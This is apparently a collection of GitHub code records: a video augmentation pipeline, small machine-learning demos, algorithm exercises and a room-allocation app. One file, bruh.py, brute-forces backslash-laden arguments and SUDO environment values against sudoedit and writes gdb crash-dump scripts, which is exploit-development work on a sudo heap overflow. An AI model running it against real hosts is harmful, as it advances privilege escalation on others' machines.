imgs = results['imgs']\n for scale in range(self.scale):\n K = self.K.copy()\n\n K[0, :] *= self.width // (2**scale)\n K[1, :] *= self.height // (2**scale)\n\n inv_K = np.linalg.pinv(K)\n imgs[(\"K\", scale)] = K\n imgs[(\"inv_K\", scale)] = inv_K\n\n for k in list(imgs):\n if \"color\" in k or \"color_n\" in k:\n n, im, i = k\n for i in range(self.scale):\n imgs[(n, im, i)] = self.resize[i](imgs[(n, im, i - 1)])\n\n results['imgs'] = imgs\n return results\n\n\n@PIPELINES.register()\nclass ColorJitter(object):\n \"\"\"Randomly change the brightness, contrast, saturation and hue of an image.\n \"\"\"\n def __init__(self,\n brightness=0,\n contrast=0,\n saturation=0,\n hue=0,\n mode='train',\n p=0.5,\n keys=None):\n self.mode = mode\n self.colorjitter = paddle.vision.transforms.ColorJitter(\n brightness, contrast, saturation, hue)\n self.p = p\n\n def __call__(self, results):\n \"\"\"\n Args:\n results (PIL Image): Input image.\n\n Returns:\n PIL Image: Color jittered image.\n \"\"\"\n\n do_color_aug = random.random() > self.p\n imgs = results['imgs']\n for k in list(imgs):\n f = imgs[k]\n if \"color\" in k or \"color_n\" in k:\n n, im, i = k\n imgs[(n, im, i)] = f\n if do_color_aug:\n imgs[(n + \"_aug\", im, i)] = self.colorjitter(f)\n else:\n imgs[(n + \"_aug\", im, i)] = f\n if self.mode == \"train\":\n for i in results['frame_idxs']:\n del imgs[(\"color\", i, -1)]\n del imgs[(\"color_aug\", i, -1)]\n del imgs[(\"color_n\", i, -1)]\n del imgs[(\"color_n_aug\", i, -1)]\n else:\n for i in results['frame_idxs']:\n del imgs[(\"color\", i, -1)]\n del imgs[(\"color_aug\", i, -1)]\n\n results['img'] = imgs\n return results\n\n\n@PIPELINES.register()\nclass GroupRandomFlip(object):\n def __init__(self, p=0.5):\n self.p = p\n\n def __call__(self, results):\n\n imgs = results['imgs']\n do_flip = random.random() > self.p\n if do_flip:\n for k in list(imgs):\n if \"color\" in k or \"color_n\" in k:\n n, im, i = k\n imgs[(n, im,\n i)] = imgs[(n, im,\n i)].transpose(Image.FLIP_LEFT_RIGHT)\n if \"depth_gt\" in imgs:\n imgs['depth_gt'] = np.array(np.fliplr(imgs['depth_gt']))\n\n results['imgs'] = imgs\n return results\n\n\n@PIPELINES.register()\nclass ToArray(object):\n def __init__(self):\n pass\n\n def __call__(self, results):\n imgs = results['imgs']\n for k in list(imgs):\n if \"color\" in k or \"color_n\" in k or \"color_aug\" in k or \"color_n_aug\" in k:\n n, im, i = k\n imgs[(n, im,\n i)] = np.array(imgs[(n, im, i)]).astype('float32') / 255.0\n imgs[(n, im, i)] = imgs[(n, im, i)].transpose((2, 0, 1))\n if \"depth_gt\" in imgs:\n imgs['depth_gt'] = np.array(imgs['depth_gt']).astype('float32')\n\n results['imgs'] = imgs\n return results\n","repo_name":"PaddlePaddle/awesome-DeepLearning","sub_path":"Paddle_Industry_Practice_Sample_Library/Football_Action/PaddleVideo/paddlevideo/loader/pipelines/augmentations.py","file_name":"augmentations.py","file_ext":"py","file_size_in_byte":37238,"program_lang":"python","lang":"en","doc_type":"code","stars":2544,"dataset":"github-code","pt":"37"} +{"seq_id":"27967906771","text":"import numpy as np\nimport pylab as plt\n\n\ndef convert_label(image_num):\n\tlabels = np.loadtxt(\"imagenet_labels/imagenet_labels.csv\", delimiter = \",\", dtype = \"str\")\n\torder = np.loadtxt(\"imagenet_labels/labels_list.csv\", delimiter = \",\", dtype = \"str\")\n\tlabel = order[image_num-1]\n\tif image_num.shape:\n\t\tall_labels = []\n\t\tfor l in label:\n\t\t\tall_labels.append((labels[np.where(labels[:,0] == l)[0]])[0,1])\n\t\tprint(all_labels)\n\telse:\n\t\tprint(labels[np.where(labels[:,0] == label)[0]])\n\n\n\nif __name__ == '__main__':\n\tconvert_label(np.array(241))\n\tconvert_label(np.array([241,2,4]))","repo_name":"jaredsfrank/AdversaryResearch","sub_path":"convert_label.py","file_name":"convert_label.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"21591371901","text":"#!/usr/bin/env python\n\nfrom itertools import permutations\nimport time\nimport os\nimport subprocess\nimport pwn\nimport sys\nfrom shlex import split, join\n\ndef getc(l):\n return pwn.cyclic(l, n=8).decode('utf-8')\n\ndef doit(envl, bufl, i):\n e = getc(envl)\n b = getc(bufl)\n c = \"-A -s '{}\\\\{}\\\\'\".format(b, e)\n s = split(\"env -i EDITOR=/usr/bin/false 'SUDO={}{}\\\\' /usr/bin/sudoedit {}\".format('\\\\'*envl, e, c))\n\n output = subprocess.run(s, stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=False)\n\n if output.returncode == -6:\n sys.stdout.write(\".\")\n return\n\n if b\"File name too long\" in output.stderr:\n sys.stdout.write(\"!\")\n return\n\n if output.returncode != -127:\n with open('iteration_{}-{}-{}_code_{}.txt'.format(i,envl, bufl, abs(output.returncode)), 'wb') as fh:\n fh.write(output.stderr)\n fh.write(bytes(join(s), 'utf8'))\n\n gdbscript = 'iteration_{}-{}-{}_code_{}.py'.format(i,envl, bufl, abs(output.returncode))\n\n with open(gdbscript, 'wb') as fh:\n print(e,b, 'iteration_{}-{}-{}_code_{}.py'.format(i,envl, bufl, abs(output.returncode)))\n fh.write(b'import gdb\\n')\n fh.write(b'gdb.execute(\"unset environment\")\\n')\n fh.write(b'gdb.execute(\"set environment EDITOR=/usr/bin/false\")\\n')\n fh.write(bytes('gdb.execute(\"set environment SUDO=\\'{}{}\\\\\\\\\\'\")\\n'.format('\\\\\\\\'*envl, getc(envl)), 'utf8'))\n fh.write(b'gdb.execute(\"file /usr/bin/sudoedit\")\\n')\n fh.write(bytes('gdb.execute(\"r -A -s \\'{}\\\\\\\\{}\\\\\\\\\\'\")\\n'.format(b,e), 'utf8'))\n fh.write(b'try:\\n')\n fh.write(bytes(' with open(\"iteration_{}-{}-{}_code_{}_gdb_env\", \"wb\") as fh:\\n'.format(i,envl, bufl, abs(output.returncode)), 'utf-8'))\n fh.write(b' fh.write(bytes(gdb.execute(\"show environment\", to_string=True),\"utf-8\"))\\n')\n fh.write(bytes(' with open(\"iteration_{}-{}-{}_code_{}_gdb_bt\", \"wb\") as fh:\\n'.format(i,envl, bufl, abs(output.returncode)), 'utf-8'))\n fh.write(b' fh.write(bytes(gdb.execute(\"bt full\", to_string=True), \"utf-8\"))\\n')\n fh.write(bytes(' with open(\"iteration_{}-{}-{}_code_{}_gdb_ir\", \"wb\") as fh:\\n'.format(i,envl, bufl, abs(output.returncode)), 'utf-8'))\n fh.write(b' fh.write(bytes(gdb.execute(\"i r\", to_string=True), \"utf-8\"))\\n')\n fh.write(bytes(' with open(\"iteration_{}-{}-{}_code_{}_gdb_heap\", \"wb\") as fh:\\n'.format(i,envl, bufl, abs(output.returncode)), 'utf-8'))\n fh.write(b' fh.write(bytes(gdb.execute(\"heap chunks\", to_string=True), \"utf-8\"))\\n')\n fh.write(b'except Exception:\\n')\n fh.write(b' pass\\n')\n fh.write(b'gdb.execute(\"quit\")\\n')\n os.fsync(fh)\n subprocess.check_output(\"/usr/bin/gdb -q -x {}\".format(gdbscript), timeout=4, shell=True)\n\nif __name__ == '__main__':\n perm = permutations(range(1,500), 2)\n i = 0\n\n for j in list(perm):\n i=i+1\n doit(j[1], j[0], i)\n","repo_name":"ArchiMoebius/snippets","sub_path":"python/bruh.py","file_name":"bruh.py","file_ext":"py","file_size_in_byte":2852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23727371776","text":"\r\n\r\n#GRADIENTE DESCENDENTE PARA RESOLVER EL PROBLEMA DE REGRESION LINEAL\r\n#Agregar al programa instrucciones que muestren lo siguiente gráficamente:\r\n\r\nfrom numpy import *\r\nfrom matplotlib import pyplot as plt\r\ndef gradient_descent(alpha, x, y, ep, max_iter):\r\n convergio = False\r\n iter = 0\r\n N = len(x) #-- número de ejemplos\r\n #-- valores iniciales de theta\r\n t0 = 0\r\n t1 = 0\r\n #-- error total, J(theta)\r\n J = sum([(t0 + t1*x[i] - y[i])**2 for i in range(N)])\r\n #-- ciclo de iteraciones\r\n #lista_obtenida[0]=lista de t0\r\n #lista_obtenida[1]=lista de t1\r\n #lista_obtenida[2]=lista de error\r\n #lista_obtenida[3]=lista de iteraciones\r\n lista_obtenida = [[],[],[],[]]\r\n while not convergio:\r\n #-- para cada ejemplo de entrenamiento calcular el gradiente (d/d_theta)j(theta)\r\n grad0 = 1.0/N * sum([(t0 + t1*x[i] - y[i]) for i in range(N)])\r\n grad1 = 1.0/N * sum([(t0 + t1*x[i] - y[i])*x[i] for i in range(N)])\r\n #-- actualizar las thetas temporales\r\n temp0 = t0 - alpha * grad0\r\n temp1 = t1 - alpha * grad1\r\n #-- actualizar las theta\r\n t0 = temp0\r\n t1 = temp1\r\n lista_obtenida[0].append(t0)\r\n lista_obtenida[1].append(t1)\r\n #-- calcula el error cuadrado medio\r\n e = sum( [(t0 + t1*x[i] - y[i])**2 for i in range(N)] )\r\n if abs(J-e) <= ep:\r\n print ('Convergió con iteraciones: ', iter, '!!!')\r\n convergio = True\r\n J = e #-- actualizar error\r\n iter += 1 #-- incrementa iteraciones\r\n lista_obtenida[2].append(e)\r\n lista_obtenida[3].append(iter)\r\n if iter == max_iter: #-- si no converge\r\n print ('Se excedió del máximo de iteraciones!')\r\n convergio = True \r\n return t0,t1,lista_obtenida #-- devuelve los valores calculados de theta0 y theta1\r\n#------- programa principal--------------\r\n#-- lee puntos de muestra del archivo data.csv\r\npuntos = genfromtxt(\"data.csv\", delimiter=\",\")\r\n#-- las coordenadas x en el arreglo x, las coordenadas y en el arreglo y\r\nx = []\r\ny = []\r\nN = len(puntos) #-- nro de puntos\r\nprint(\"Nro de datos leidos: \", N)\r\nfor i in range(N):\r\n x.append(puntos[i,0])\r\n y.append(puntos[i,1])\r\n#-- parametros iniciales\r\nalfa= 0.0001 #-- learning rate\r\nep = 0.00001 #-- tolerancia\r\nmax_itera= 1000000 #-- nro maximo de iteraciones\r\n#-- comienza el gradiente descendente\r\ntetha0, tetha1, lista_para_graficar = gradient_descent(alfa,x,y,ep,max_itera)\r\n#-- mostrar resultados\r\nprint('Theta0: ',tetha0)\r\nprint('Theta1: ',tetha1)\r\n\r\n\r\n#PARTE A : Error Cuadrado Medio versus el número de iteraciones.\r\nimport numpy as np\r\nplt.figure(figsize=(10,6))\r\nplt.plot(lista_para_graficar[3], lista_para_graficar[2])\r\nplt.xlabel('Numero de iteraciones')\r\nplt.ylabel('Error cuadrado medio')\r\nplt.title('Error cuadrado medio VS Numero de iteraciones')\r\nplt.grid(True)\r\n\r\n#PARTE B : Los valores de θ1 y θ0 versus el número de iteraciones.\r\nplt.figure(figsize=(10,6))\r\nplt.plot(lista_para_graficar[3], lista_para_graficar[0], label='θ0 vs iteraciones')\r\nplt.plot(lista_para_graficar[3], lista_para_graficar[1], label='θ1 vs iteraciones')\r\nplt.xlabel('Numero de iteraciones')\r\nplt.ylabel('Valores de Theta')\r\nplt.title('θ0 y θ1 VS el número de iteraciones')\r\nplt.legend()\r\nplt.grid(True)\r\n","repo_name":"cesarodrigo21/DeepLearning","sub_path":"T1/tarea.py","file_name":"tarea.py","file_ext":"py","file_size_in_byte":3186,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70531926189","text":"# -*- coding: utf-8 -*-\n# UTF-8 encoding when using korean\nfrom pip._vendor.distlib.compat import raw_input\n\nage = input(\"나이를 입력해 주세요: \")\n#=> 20 입력\nprint(age)\n#=> 20 출력\n\nname = raw_input(\"이름을 입력해 주세요 : \")\n#=>홍길동 입력\nprint(name)\n#=>홍길동 출력","repo_name":"EricSeokgon/pythonRun","sub_path":"chapter2/sec02.py","file_name":"sec02.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"39634773021","text":"import tensorflow as tf\nimport numpy as np\n\nx = tf.placeholder(shape=[5], dtype=tf.float32)\ny = tf.placeholder(shape=[], dtype=tf.float32)\n\ntrain_size = 1000\nx_vals = np.random.randn(5, train_size)\n# x_vals=np.linspace(0,1,train_size)\ny_vals = 1 * x_vals[0] + 2 * x_vals[1] + 3 * x_vals[2] + 4 * x_vals[3] + 5 * x_vals[4] + 10\n\nA = tf.Variable(tf.random_normal(shape=[5]))\nB = tf.Variable(tf.random_normal(shape=[]))\ntemp = 0\nfor i in range(5):\n temp += A[i] * x[i]\ntemp += B\nmodel_output = temp\n\ninit = tf.global_variables_initializer()\nlearning_rate = 0.1\nmy_opt = tf.train.GradientDescentOptimizer(learning_rate)\nloss = tf.reduce_mean(tf.square(model_output - y))\ntrain = my_opt.minimize(loss)\n\nsess = tf.Session()\nsess.run(init)\n\nprint('initial: A=' + str(sess.run(A)) + ' B=' + str(sess.run(B)))\nfor i in range(train_size):\n sess.run(train, feed_dict={x: x_vals[:, i], y: y_vals[i]})\nprint('training: A=' + str(sess.run(A)) + ' B=' + str(sess.run(B)))\n","repo_name":"LikeFishInWater/python","sub_path":"test_batch.py","file_name":"test_batch.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32836381750","text":"import jax\nfrom jax import numpy as jnp\nfrom jax.scipy.special import logsumexp\nfrom policies_disc.agents.DQN import DQN\nfrom policies_disc.networks.gaussian import Gaussian as Network\n\n\nclass DoubleGum(DQN):\n def __init__(self, obs, num_actions, args):\n self.network_fn = lambda obs: Network(num_actions, args.network, args.network_groups)(obs)\n self.initialize_all(obs, args)\n\n\n def beta_log_sum_exp(self, info):\n locs = info.pop('q')\n std = info.pop('std')\n spread = std * jnp.sqrt(3) / jnp.pi\n exponents = locs / spread\n log_sum_exp = logsumexp(exponents, axis=-1)\n return log_sum_exp.squeeze(), spread.squeeze()\n\n\n def soft_v(self, state, seed, obs):\n info = self.network_model_apply(state.target.network, state.network.sn_state, seed, obs)[0]\n log_sum_exp, spread = self.beta_log_sum_exp(info)\n return spread * log_sum_exp\n\n\n def target_network(self, state):\n info = self.network(self.state.target.network, self.state.network.sn_state, self.rngs.get_key(), state)[0]\n log_sum_exp, spread = self.beta_log_sum_exp(info)\n return spread * log_sum_exp\n\n\n def network_loss(self, params, state, batch, seed):\n state = jax.lax.stop_gradient(state)\n seed1, seed2 = jax.random.split(seed)\n\n target_Q = self.soft_v(state, seed1, batch['next_obs'])\n discount = self.args.discount ** self.args.nstep\n done = 1. - batch['done'].squeeze()\n target_Q = done * discount * target_Q\n target_Q = batch['rew'].squeeze() + target_Q\n\n online_info, sn_state = self.network_model_apply(params, state.network.sn_state, seed2, batch['obs'], update_stats=True)\n online_Q = online_info.pop('q')\n online_std = online_info.pop('std').squeeze()\n action = batch['act'].squeeze().astype(int)\n online_Q = online_Q[self.index, action]\n\n std_sg = jax.lax.stop_gradient(online_std)\n td_loss = online_Q - target_Q\n loss = jnp.log(online_std) + .5 * (td_loss / online_std) ** 2.\n loss = std_sg * loss\n loss_mean = loss.mean()\n loss_std = loss.std()\n\n aux = {\n 'td_loss' : td_loss.mean(),\n 'td_loss_std': td_loss.std(),\n 'sn_state' : sn_state,\n 'loss' : loss_mean,\n 'loss_std' : loss_std,\n\n 'target_Q_mean': target_Q.mean(),\n 'online_Q' : online_Q.mean(),\n 'target_Q_std' : target_Q.std(),\n 'online_Q_std' : online_Q.std(),\n }\n return loss_mean, aux\n\n\n def _td_loss(self, state, batch, seed):\n state = jax.lax.stop_gradient(state)\n seed1, seed2 = jax.random.split(seed)\n\n target_Q = self.soft_v(state, seed1, batch['next_obs'])\n discount = self.args.discount ** self.args.nstep\n done = 1. - batch['done'].squeeze()\n target_Q = done * discount * target_Q\n target_Q = batch['rew'].squeeze() + target_Q\n\n online_info, sn_state = self.network_model_apply(state.network.params, state.network.sn_state, seed2, batch['obs'], update_stats=True)\n online_Q = online_info.pop('q')\n online_std = online_info.pop('std').squeeze()\n action = batch['act'].squeeze().astype(int)\n online_Q = online_Q[self.td_index, action]\n\n aux = {\n 'target_Q': target_Q,\n 'online_Q': online_Q,\n 'online_std': online_std,\n 'done': done\n }\n return aux\n","repo_name":"dyth/doublegum","sub_path":"policies_disc/agents/DoubleGum.py","file_name":"DoubleGum.py","file_ext":"py","file_size_in_byte":3725,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"6308241811","text":"import unittest\nfrom typing import List\n\nclass Solution:\n def fourSumCount(self, A: List[int], B: List[int], C: List[int], D: List[int]) -> int:\n m = {}\n res = 0\n for a in A:\n for b in B:\n m[a + b] = m.get(a + b, 0) + 1\n\n for c in C:\n for d in D:\n res += m.get(-(c + d), 0)\n\n return res\n\n def kSumCount(self, lists: List[List[int]]) -> int:\n m = {}\n\n # This method populates the first half of lists into m\n def addToHash(lists, idx, sum):\n if idx == len(lists) // 2:\n m[sum] = m.get(sum, 0) + 1\n else:\n for a in lists[idx]:\n addToHash(lists, idx + 1, sum + a)\n\n def countComplements(lists, idx, complement):\n # reach the end of the lists\n if idx == len(lists):\n return m.get(complement, 0)\n else:\n cnt = 0\n for b in lists[idx]:\n cnt += countComplements(lists, idx + 1, complement - b)\n return cnt\n \n addToHash(lists, 0, 0)\n return countComplements(lists, len(lists) // 2, 0)\n \n\nclass Test(unittest.TestCase):\n def setUp(self):\n self.solution = Solution()\n\n def test_1(self):\n \n nums1 = [1, 2] \n nums2 = [-2, -1] \n nums3 = [-1, 2] \n nums4 = [0, 2]\n expect = 2\n # actual = self.solution.fourSumCount(nums1, nums2, nums3, nums4)\n # self.assertEqual(expect, actual)\n actual = self.solution.kSumCount([nums1, nums2, nums3, nums4])\n self.assertEqual(expect, actual)\n\n def test_2(self):\n \n nums1 = [0 for i in range(200)] \n nums2 = [0 for i in range(200)] \n nums3 = [0 for i in range(200)] \n nums4 = [0 for i in range(200)]\n expect = 200 * 200 * 200 * 200\n # actual = self.solution.fourSumCount(nums1, nums2, nums3, nums4)\n # self.assertEqual(expect, actual)\n actual = self.solution.kSumCount([nums1, nums2, nums3, nums4])\n self.assertEqual(expect, actual)\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"oscarchang1226/programming-challenges","sub_path":"leetcode/4sum-ii/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":2227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10466008092","text":"import copy\n\n\ndef la_place(matrix):\n var = copy.deepcopy(matrix)\n if len(var) == 2:\n return var[0][0] * var[1][1] - var[0][1] * var[1][0]\n\n g = -1\n det = 0\n\n for i in range(len(var)):\n g *= -1\n if matrix[0][i] == 0:\n continue\n det += g * matrix[0][i] * la_place(scale_down(var, i))\n return det\n\n\ndef scale_down(matrix, i):\n var = copy.deepcopy(matrix)\n if len(var) > 2:\n var.pop(0)\n for x in range(len(var)):\n var[x].pop(i)\n return var\n\n\na = [[0, 0, 0, 3, 2, 3],\n [1, 3, 2, 2, 2, 5],\n [9, 9, 9, 3, 3, 6],\n [9, 9, 9, 4, 5, 7],\n [1, 2, 3, 5, 4, 5],\n [2, 6, 2, 3, 4, 1]]\nprint(la_place(a))\n","repo_name":"remles1/Matrix-determinant-laplace","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17338586965","text":"import os\nimport sys\nfrom os import path\n\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom tools.tools import *\nfrom termcolor import cprint\n\nfrom modules.database import Base, People, Rooms, Unallocated\nfrom modules.people import Fellow, Person, Staff\nfrom modules.rooms import LivingSpace, Office, Room\n\n\nsys.path.append(path.dirname(path.dirname(path.abspath(__file__))))\n\n\nclass Dojo():\n\n \"\"\"Contains functions to create rooms, add people, and\n printing room allocations\n \"\"\"\n\n # initialises the class\n\n def __init__(self):\n self.offices = []\n self.living_spaces = []\n self.office_unallocated = []\n self.living_unallocated = []\n\n def add_person(self, person_name, person_role, accommodation=\"N\"):\n \"\"\"Creates people and assigns them a room. Adds them to the unallocated\n list if no rooms exist\"\"\"\n\n random_office = random_empty_room(self.offices)\n random_livingspace = random_empty_room(self.living_spaces)\n if person_role == \"fellow\":\n person = Fellow(person_name, accommodation)\n elif person_role == \"staff\":\n person = Staff(person_name)\n else:\n print(\"Role \" + str(person_role) + \" is not recognised\")\n return \"Wrong person role\"\n\n # Add to unallocated if all rooms are full\n\n add_to_office = True\n add_to_living = True\n if random_office == \"Full\":\n self.office_unallocated.append(person)\n add_to_office = False\n print(str(person_name) + \" added to office waiting list\")\n if random_livingspace == \"Full\":\n self.living_unallocated.append(person)\n add_to_living = False\n print(str(person_name) + \" added to living space waiting list\")\n\n # Add to room\n\n if add_to_office:\n random_office.add_occupant(person)\n person.office_name = random_office.name\n print(str(person_name) + \" added to Office \" +\n random_office.name)\n\n if isinstance(person, Staff):\n print(\"No living space allocated\")\n return \"Cannot add staff to living space\"\n\n if not person.accommodation == \"Y\":\n return \"Person not allocated a living space\"\n\n if add_to_living:\n if person.accommodation == \"Y\":\n random_livingspace.add_occupant(person)\n person.living_space_name = random_livingspace.name\n print(str(person_name) + \" added to Living Space \" +\n random_livingspace.name)\n\n def create_room(self, room_type, room_names):\n \"\"\"Calls the room creator method with room type and an array\n of room names as arguments\"\"\"\n\n room_types = [\"office\", \"living_space\"]\n if room_type not in room_types:\n cprint(\" \" + room_type + \" is not a valid room type.\", \"red\")\n return \"Wrong room type\"\n\n for room_name in room_names:\n self.room_creator(room_type, room_name)\n\n if room_type == \"office\":\n assign_unallocated(self.office_unallocated,\n self.offices)\n elif room_type == \"living_space\":\n assign_unallocated(self.living_unallocated,\n self.living_spaces)\n\n cprint(\"\\n Offices quantity: \" + str(len(self.offices)) +\n \"\\n Living Spaces: \" + str(len(self.living_spaces)) +\n \"\\n\", \"green\")\n\n def room_creator(self, room_type, room_name):\n \"\"\"Creates rooms; either offices or living spaces and appends\n it to either office_array or living_space_array\"\"\"\n\n all_rooms = self.offices + self.living_spaces\n room_names = [room.name for room in all_rooms]\n for name in room_names:\n if name.upper() == room_name.upper():\n cprint(\"Room named \" + room_name + \" already exists\", \"red\")\n return \"Room exists\"\n\n # Create office or living_space\n\n if room_type == \"office\":\n new_room = Office(room_name)\n self.offices.append(new_room)\n\n elif room_type == \"living_space\":\n new_room = LivingSpace(room_name)\n self.living_spaces.append(new_room)\n\n else:\n cprint(\"\\n The room type \" + room_type + \" is not in system\",\n \"red\")\n return \"Wrong room type\"\n\n cprint(\"\\n Created \" + new_room.type + \" \" + room_name, \"green\")\n return \"Created Successfully\"\n\n def print_room(self, room_name):\n \"\"\"Prints occupants in room with name parsed as argument\"\"\"\n\n merged_array = self.offices + self.living_spaces\n\n if merged_array:\n strings = []\n for room in merged_array:\n\n if room_name == room.name:\n strings.append(\"\\nAllocation: \\n\")\n strings.append(\"\\tRoom Name: \" + room_name +\n \" (\" + room.type + \").\\n\")\n\n strings.append(people_string(room.occupants))\n\n strings.append(\"\\n\")\n return ''.join(strings)\n\n return \"Room doesnt exist\"\n\n else:\n return (\"\\n There are no rooms to print\\n\")\n\n def print_allocations(self, output):\n \"\"\"Returns a string with all allocations in office and living_spaces\"\"\"\n\n strings = []\n strings.append(\"\\nALLOCATIONS: \\n\")\n strings.append(\"\\tOFFICES\\n\")\n strings.append(\"\\t---------\")\n\n # Generate string with information on office occupants\n\n if self.offices:\n for office in self.offices:\n strings.append(\"\\n\\tOffice Name: \" + office.name + \"\\n\")\n strings.append(people_string(office.occupants))\n else:\n strings.append(\"\\n\\tThere are no offices in the system\\n\")\n\n strings.append(\"\\n\\tLIVING SPACES\\n\")\n strings.append(\"\\t----------------\")\n\n # Generate string with information on living space occupants\n\n if self.living_spaces:\n for living_space in self.living_spaces:\n strings.append(\"\\n\\tLiving Space Name:\" +\n living_space.name + \"\\n\")\n strings.append(people_string(living_space.occupants))\n else:\n strings.append(\"\\n\\tThere are no living spaces in the system\\n\")\n\n strings.append(\"\\n\")\n string = ''.join(strings)\n\n # returns the string to be printed to console or creates txt file\n # and writes to it.\n\n if output is None:\n return string\n\n else:\n file_name = \"output/\" + output\n with open(file_name, 'w') as file_output:\n file_output = open(file_name, \"w\")\n file_output.write(string)\n file_output.close()\n return \"File saved to \" + file_name + \".\"\n\n def print_unallocated(self, output):\n \"\"\"Returns all unallocated persons either printed to console or\n to text file\"\"\"\n\n strings = []\n strings.append(\"\\nUNALLOCATED: \\n\")\n\n strings.append(\"\\tOFFICES\\n\")\n strings.append(\"\\t---------\\n\")\n strings.append(people_string(self.office_unallocated))\n\n strings.append(\"\\n\\tLIVING SPACES\\n\")\n strings.append(\"\\t---------------\\n\")\n strings.append(people_string(self.living_unallocated))\n\n string = ''.join(strings)\n\n if output is None:\n return string\n\n else:\n file_name = \"output/\" + output\n with open(file_name, 'w') as file_output:\n file_output = open(file_name, \"w\")\n file_output.write(string)\n file_output.close()\n return \"File saved to path: '\" + file_name + \"'.\"\n\n def reallocate_person(self, person_identifier, room_name):\n \"\"\"Reallocates person to another room\"\"\"\n\n if not is_int(person_identifier):\n cprint(\"\\n Id must be an integer, type 'print_allocations' \" +\n \"to view all people's id(s)\", \"red\")\n return \"Not an integer\"\n\n selected_room = \"None\"\n selected_person = \"None\"\n current_room = \"None\"\n merged_array = self.offices + self.living_spaces\n\n # Find room to be reallocated to.\n\n for room in merged_array:\n if room.name == room_name:\n selected_room = room\n break\n\n if not isinstance(selected_room, Room):\n cprint(\" Room doesnt exist\", \"red\")\n return \"Room doesnt exist\"\n\n # Find person to be reallocated and person's current room\n\n if selected_room.type == \"office\":\n for office in self.offices:\n for person in office.occupants:\n if int(person.id_key) == int(person_identifier):\n current_room = office\n selected_person = person\n break\n\n elif selected_room.type == \"living_space\":\n for living_space in self.living_spaces:\n for person in living_space.occupants:\n if int(person.id_key) == int(person_identifier):\n current_room = living_space\n selected_person = person\n break\n\n if not isinstance(selected_person, Person):\n cprint(\" Person is not allocated to any \" +\n selected_room.type + \"s\", \"red\")\n return \"Wrong reallocation\"\n\n # Reallocates person if room_type match, person & room exists and\n # destination is not full\n\n if current_room.name == room_name:\n cprint(\"\\n Person is already in the room\\n\", \"red\")\n return \"Wrong reallocation\"\n\n if current_room.type == selected_room.type:\n\n if selected_room.has_space():\n if selected_room.type == \"office\":\n selected_person.office_name = selected_room.name\n elif selected_room.type == \"living_space\":\n selected_person.living_space_name = selected_room.name\n\n selected_room.add_occupant(selected_person)\n current_room.occupants.remove(selected_person)\n cprint(\"\\n \" + selected_person.name +\n \" has been reallocated to \" +\n selected_room.type + \" \" +\n selected_room.name + \"\\n\", \"green\")\n\n else:\n return \"Destination is full\"\n\n else:\n cprint(\"\\n You have to reallocate to similar room types\" +\n \"\\n\", \"red\")\n return \"Cannot add to room\"\n\n def load_people(self, file_name):\n \"\"\"Loads people from a text file and adds them to rooms\"\"\"\n\n full_file_name = \"input/\" + str(file_name)\n try:\n input_file = open(full_file_name)\n data_list = input_file.readlines()\n\n # Loops through all lines in text file checking for data integrity\n # then calls the add person function to create and assign random\n # room\n\n for data in data_list:\n person_data = data.split()\n\n if len(person_data) >= 3 and len(person_data) <= 4:\n person_name = str(\n person_data[0]) + \" \" + str(person_data[1])\n person_role = str(person_data[2])\n\n if len(person_data) == 4:\n person_accommodation = str(person_data[3])\n else:\n person_accommodation = \"N\"\n\n self.add_person(person_name, person_role,\n person_accommodation)\n else:\n cprint(\"\\n Data is corrupt, check format and try again\",\n \"red\")\n\n input_file.close()\n\n except(FileNotFoundError):\n cprint(\"\\n File not found\\n\", \"red\")\n return \"File not found\"\n\n def save_state(self, database=None):\n \"\"\"Saves data for rooms, persons, and unallocated persons to the sqlite\n database provided, saves to default.db if no database is provided\"\"\"\n\n if database is None:\n database = \"default.db\"\n if os.path.exists(database):\n os.remove(database)\n\n database_name = \"sqlite:///\" + str(database)\n engine = create_engine(database_name)\n Base.metadata.bind = engine\n Base.metadata.create_all(engine)\n cprint(\"\\n Database \" + database_name + \" was created successfully\",\n \"green\")\n\n Session = sessionmaker(bind=engine)\n session = Session()\n\n # Add rooms\n\n merged_rooms = self.offices + self.living_spaces\n people_array = []\n for room in merged_rooms:\n room_name = room.name\n room_type = room.type\n db_room = Rooms(room_name, room_type)\n session.add(db_room)\n\n # Filter people to avoid duplicates\n\n for person in room.occupants:\n\n if person not in people_array:\n people_array.append(person)\n\n session.commit()\n\n # Add allocated people\n\n for person in people_array:\n\n person_living_space_name = \"\"\n if person.role == \"fellow\":\n person_living_space_name = person.living_space_name\n elif person.role == \"staff\":\n person_living_space_name = \"None\"\n\n db_person = People(person.name, person.role, person.gender,\n person.age, person.office_name,\n person_living_space_name)\n\n session.add(db_person)\n\n session.commit()\n\n cprint(\" All rooms have been added to the database successfully\",\n \"green\")\n\n # Add unallocated persons\n\n merged_unallocated = self.office_unallocated + self.living_unallocated\n for person in merged_unallocated:\n\n if person in self.office_unallocated:\n room_type = \"office\"\n db_unallocated = Unallocated(person.name, person.role, \"office\",\n person.gender, person.age)\n session.add(db_unallocated)\n\n if person in self.living_unallocated:\n room_type = \"living_space\"\n db_unallocated = Unallocated(person.name, person.role, \"living_space\",\n person.gender, person.age)\n session.add(db_unallocated)\n\n session.commit()\n cprint(\" Unallocated persons have been added to the database\" +\n \"successfully\\n\", \"green\")\n\n if os.path.exists(database):\n return \"Success\"\n\n def load_state(self, database=None):\n \"\"\"Loads data from 